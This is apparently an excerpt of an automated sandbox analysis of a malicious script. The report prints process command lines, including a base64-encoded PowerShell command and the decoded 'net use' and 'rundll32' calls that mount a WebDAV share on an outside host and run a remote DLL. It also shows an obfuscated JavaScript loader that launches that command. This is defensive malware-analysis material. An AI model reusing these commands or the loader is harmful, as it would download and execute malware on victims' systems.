            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:07:03:37
            Start date:28/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:07:03:39
            Start date:28/10/2024
            Path:C:\Windows\System32\net.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
            Imagebase:0x7ff737730000
            File size:59'904 bytes
            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:07:03:40
            Start date:28/10/2024
            Path:C:\Windows\System32\rundll32.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry
            Imagebase:0x7ff6494f0000
            File size:71'680 bytes
            MD5 hash:EF3179D498793BF4234F708D3BE28633
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Call Graph

            • Executed
            • Not Executed
            callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

            Script:

            Code
            0
            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
              1
              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                2
                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                  3
                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                    4
                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                      5
                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                        6
                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                          7
                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                            8
                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                              9
                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                10
                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                  11
                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                    12
                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                      13
                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                        14
                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                          15
                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                            16
                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                              17
                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                18
                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                  19
                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                    20
                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                      21
                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                        22
                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                          23
                                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                            24
                                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                              25
                                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                26
                                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                  27
                                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                    28
                                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                      29
                                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                        30
                                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                          31
                                                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                            32
                                                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                              33
                                                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                34
                                                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                  35
                                                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                    36
                                                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                      37
                                                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                        38
                                                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                          39
                                                                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                            40
                                                                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                              41
                                                                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                42
                                                                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                  43
                                                                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                    44
                                                                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                      45
                                                                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                        46
                                                                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                          47
                                                                                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                            48
                                                                                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                              49
                                                                                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                50
                                                                                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                  51
                                                                                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                    52
                                                                                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                      53
                                                                                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                        54
                                                                                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                          55
                                                                                                                          wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                            56
                                                                                                                            wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                              57
                                                                                                                              wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                58
                                                                                                                                wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                  59
                                                                                                                                  wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                    60
                                                                                                                                    wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                      61
                                                                                                                                      wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                        62
                                                                                                                                        wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb...
                                                                                                                                          63
                                                                                                                                          Function ( '' + wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogj...
                                                                                                                                          • Function("return this") ➔ function anonymous()
                                                                                                                                          • () ➔
                                                                                                                                          • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                          • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtA...",0,false) ➔ 0
                                                                                                                                          Reset < >
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1723498353.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                            • Instruction ID: 6c53e4b0e9e57e540be446d61fdf101b8c3d83c950fb20561b916774a3ebe4f7
                                                                                                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                            • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41